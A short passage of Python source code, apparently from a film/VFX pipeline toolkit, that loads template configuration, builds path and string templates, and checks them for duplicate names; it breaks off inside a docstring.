pipeline_configuration.get_templates_config() \n \n # get dictionaries from the templates config file:\n def get_data_section(section_name):\n # support both the case where the section \n # name exists and is set to None and the case where it doesn't exist\n d = data.get(section_name)\n if d is None:\n d = {}\n return d \n \n keys = templatekey.make_keys(get_data_section(\"keys\"))\n template_paths = make_template_paths(get_data_section(\"paths\"), keys, pipeline_configuration.get_data_roots() )\n template_strings = make_template_strings(get_data_section(\"strings\"), keys, template_paths)\n\n # Detect duplicate names across paths and strings\n dup_names = set(template_paths).intersection(set(template_strings))\n if dup_names:\n raise TankError(\"Detected paths and strings with the same name: %s\" % str(list(dup_names)))\n\n # Put paths and strings together\n templates = template_paths\n templates.update(template_strings)\n return templates\n\n\ndef make_template_paths(data, keys, roots):\n \"\"\"\n Factory function which creates TemplatePaths.\n\n :param data: Data from which to construct the template paths.\n :type data: Dictionary of form: {